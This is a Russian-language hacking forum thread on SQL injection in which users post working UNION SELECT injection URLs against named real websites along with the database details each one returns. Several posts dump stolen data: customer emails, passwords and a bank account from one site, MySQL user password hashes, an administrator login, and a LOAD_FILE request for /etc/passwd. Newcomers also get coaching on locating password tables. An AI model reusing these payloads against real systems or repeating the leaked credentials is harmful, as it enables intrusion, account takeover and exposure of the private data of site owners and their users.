SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Питерское интернет кафе!

    http://www.shangrila-spb.ru/index.php?action=view&id=-73+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13-- &module=newsmodule&src=%40random41940a897e943

    Database Version: 4.1.11-Debian_4sarge7-log
    Database name: shangrila
    User name: adminn@localhost

    Детишкам поиграться -)

    http://www.play-publishing.com/?id=72+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11--

    4.0.22
    majkel@play.play.com.pl
    musiccd

    тИЦ = 40
    PageRank = 5


    http://www.dorian.ru/catalog/dog.php?screen=1&id=-72+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12--

    5.0.67-log
    u26951@10.10.10.216
    u26951_catalog

    тИЦ = 275
     
  2. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    Code:
    http://www.swschool.org/news_detail.php?id=-1+union+select+1,version(),user(),database()/*
    version: 4.1.20
    user: ssac@mrcrabs.toolbox.net
    database: ssac

    Code:
    http://articles.student.com/article.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14/*
    version: 4.0.21-standard-log
    user: webuser@web1
    database: studcent

    Code:
    http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11/*
    version: 4.1.22-standard-log
    user: opednews_vidya@localhost
    database: opednews_pearl

    Code:
    http://energyteachers.org/ReadArticle.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
    version: 5.0.45-log
    user: etouser@205.178.145.65
    database: eto

    Code:
    http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
    version: 4.1.22-standard-log
    user: 334937_alfred@172.16.11.218
    database: 334937_calcms

    Code:
    http://rwjcsp.yale.edu/community.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    version: 4.0.24-log
    user: rwjEditor@web.med.yale.edu
    database: rwj

    Code:
    http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
    version: 4.0.27-standard-log
    user: dbo120565932@212.227.119.149
    database: db120565932

    Code:
    http://www.business-academy.ru/viezd.php?id=-1+union+select+1,version(),3,4,5/*
    version: 5.0.45-Max-log
    user: srv11037_forum21@c29-w.ht-systems.ru
    database: srv11037_forum

    user: lenar
    pass: vcxzasdf123

    Code:
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
    version: 5.0.45-log
    user: oxid@localhost
    database: synaptic

    http://www.conex.biz.ua/auction.php?id=-1+union+select+1,version(),3/*

    version: 4.1.22-log
    user: conex@alpha
    database: conex
     
  3. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Народ, помогите ламеру!!!
    Нашол уязвимость, полей 15, а что дальше делать,понять не могу. Вставлял любые коды, везде ошибка. попробуйте вы...скажите где ошибка
     
  4. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
     
  5. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    PHP:
    Forbidden    You don't have permission to access / on this server.
    гм...
     
  6. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    это сайт провайдера нашего....возможно вас просто не пускают
     
  7. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17/*

    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/igor/public_html/megaload/program.php on line 121
     
  8. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Всё...всем спасибо...тупо провтыкал куда ставить запрос
     
  9. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    народ. подскажите как можна вытянуть имя таблицы для получения pass?

    http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
     
  10. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    Forbidden типа запрещенный дотсуп
     
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://irp.poltava.ua/news.php?news_id=8546[sql]
    3-я ветка...
    __________________________________________

    "Журнал ДентАрт"

    Code:
    http://www.dentart.org/rubriki.php?rubr=-1+union+select+1,2,version(),4--
    5.0.67-community
     
  12. vladvk

    vladvk New Member

    Joined:
    22 Dec 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    synaptic.ru
    Докрутил, но такого еще не видел, не стал разбираться что куда сувать надо:
    Если кто будет раэбираться,потом пожалуйста отпишитесь
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(bank_account,char(58),bank_name,char(58),email,char(58),char(58),password),4,5,6,7,8,9,10,11,12,13+from+synaptic.users/*
    ::tapakaiiika@yandex.ru::620be1
    40702810990010002180:САНКТ-ПЕТЕРБУРГСКИЙ Ф-Л АКБ "СОЮЗ" (ОАО):vsevolod.trofimov@synaptic.ru::uu876ujih98
    ::eek:lga160@rambler.ru::983016
    ::a_fedotov@pochta.ru::f7fb60
    ::metelev2007@mail.ru::584889
    ::rg.90@mail.ru::1d6b57
    ::evseevigor@mail.ru::34a06e
    ::eek:lefimova@gmail.com::436c69
    ::IVAN VESELOV@SYNAPTIC.RU::b0b906
    ::IVAN.VESELOV@SYNAPTIC.RU::cbfcdf
    ::honda-civic@list.ru::5188dc
    ::spawnok@spawnok.com::0ebf27
    ::sergey.g@freenet.de::4e1891

    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+psy.users/*
    Всеволод Викторович Трофимов:vsev
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.users/*
    seva:vsev
    efaberge:eggs
    jurist:140382
    igorv112:qazwsxedc
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.opinion_users/*
    seva:vsevolod@artlinemedia.ru:ceb3e6
    Всеволод:seva@artlinemedia.ru:282573
    Сева:music@yandex.ru:c65cfa
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(host,char(58),port,char(58),user,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.ftp_servers/*
    mp3.int.ru:21:anonymous:doh@doh.doh
    212.182.63.138:21:anonymous:doh@doh.doh
    216.71.74.4:21:anonymous:doh@doh.doh
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.developers_app/*
    oxid:vbiflt
    oxid1:vsev
    nitroamplifire:xiquliquitrux
    winamp:pmaniw
    leosoft:leoam
    DJUSHMAN:andron
    gf:gf
    Yliya:01071986
    Ylizka:01071986
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.author/*
    Эстрина Инна:inch@molinos.ru:ghjtrn
    РОФФ ТЕКНОЛОДЖИЗ:svetlana@roff.ru:techno
    Агентство "Выше Радуги":esmi@uprainbow.ru:rainbow
    Урюпин Д.А.:gebo@land.ru:kalendar
    openmusic.ru:eek:penmusic@openmusic.ru:rainbow
    :info@kushnir.ru:production
    :info@castlerock.ru:rok
    Лебедева Елена:internet@kushnir.ru:kushnirint
    Оксана и Егор:eglute@nm.ru:3214фф
    Саванчук Катерина:marsinred@mail.ru:123фыв
    Мария Карпеева:thedevoted@mail.ru:ghrtt
    Евгения Карасева:ekarasyova@mail.ru:dsdw2
    Елена Волосова:volosova@reakcia.ru:action
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Password,char(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
    :357a136b2575f97f:root :5be372e038520af0:eek:xid localhost:4844f090239f56e0:wikiuser :499bd4ec632aac25:dmitr
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Db,char(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.db/*
    %::eek:xid %:test: %:test\_%: %:wikidb:wikiuser
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(email,char(58),password),4,5,6,7,8,9,10,11,12,13+from+malkov.users/*
    email@email.ro: 2222:п
    http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),password),4,5,6,7,8,9,10,11,12,13+from+identification.users+limit+0,1/*
    seva:vsev Larisa:gammy
     
  13. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Скажите плиз, как из ссылки которую дал R1dex вытянуть таблицу чтоб потом можна было позырить пасс?
    Или киньте ссыль на какой нить фак по этой теме.
    Всё обыскал...нет такого. Просто не пойму зачем нужен user и database толку с них?
     
  14. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Скажи плиз...где ты названия таблиц брал!! У меня уже крышу сносит! Помоги нубу
     
  15. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://www.cohenhillel.org/about/profile.php?pid=-379+union+select+concat_ws(0x7c,user(),database(),version()),2,3/*

    scully@localhost|scully|4.1.22

    2vakula если правильно понял твой вопрос рой в сторону information_schema чтоб знать названия таблиц если версия 5.....) а user() и database() определенной ценности не несут) поможет только если ты имеешь доступ к mysql.user)
     
  16. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    kino.com
    USER kino@lma671.siteprotect.com
    VERSION 4.0.12-standard
    DATABASE kino

    Google PR: 7
     
  17. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://www.pangeaday.org/filmDetail.php?id=-72/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

    Version:5.0.45-log
    User:dr30628@192.168.1.131
    Database:pangea


    PageRank = 7

    http://www.gsi.ru/catalog.php?id=-72+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13--

    Version:4.0.24_Debian-10sarge2
    User:root@localhost
    Database:gsi

    тИЦ = 800

    http://mympeg.ru/video.htm?id=-72+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,version(),user(),database()),11,12,13,14,15--

    Version:4.1.22-log
    User:mympeg@localhost
    Database:wwwmympeglggru

    PageRank = 5
     
    #7277 spherics, 4 Jan 2009
    Last edited: 4 Jan 2009
    1 person likes this.
  18. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    bloggingheads.tv
    Обратите внимание на вывод! :) Возможно, кому то покажется, что принтабельных полей нет.. но, если присмотреться ;)..

    VERSION: 5.0.45-log
    USER brainwav@66.39.65.222
    DATABASE brainwav_bhtvee

    Логин и пасс админа: rw:exnihil0

    Google PR: 7
     
    #7278 Thrasher88, 4 Jan 2009
    Last edited: 4 Jan 2009
  19. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://www.usp.br/internacional/home.php?id_cont=12345674+union+select+1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12,13,14,15--&idioma=en


    Database Version: 4.0.24_Debian-10sarge3-log
    Database name: w3internacional
    User name: w3internacional@localhost


    PageRank = 8





    http://www.skyalbum.com/showAlbum/222225368/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15--

    Version:5.0.22
    User:skyalbum_db_user@localhost
    Database:skyalbum


    PageRank = 7


    http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,(SELECT/**/CONCAT(User,0x7873716C696E6A64656C,Password)/**/FROM/**/mysql.user/**/LIMIT/**/8,1),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15--

    [1]:root:
    [2]::
    [3]::
    [4]:vbulletin_user:6081047447093d5f
    [5]:socu:7007c5b04ac32a70
    [6]:skyalbum_db_user:5d651ca80db22e8a
    [7]:skyalbum_user:17f2b11a7aaa0d14
    [8]:skyalbum_db_user:5d651ca80db22e8a


    Читаем /etc/passwd и так далее

    http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706173737764),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15--




    http://www.specialradio.ru/p&d/?id=722222+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10--

    Version:4.1.22
    User:specialr_speci01@node1.hc.ru
    Database:wwwspecialradior_specialradio

    тИЦ = 1000
    PageRank = 6
     
    #7279 spherics, 4 Jan 2009
    Last edited: 4 Jan 2009
  20. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://pointsonline.com/php/get_merchant_info.php?a=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3--
    loyalty@localhost:4.1.22-standard-log:loyalty
     
Thread Status:
Not open for further replies.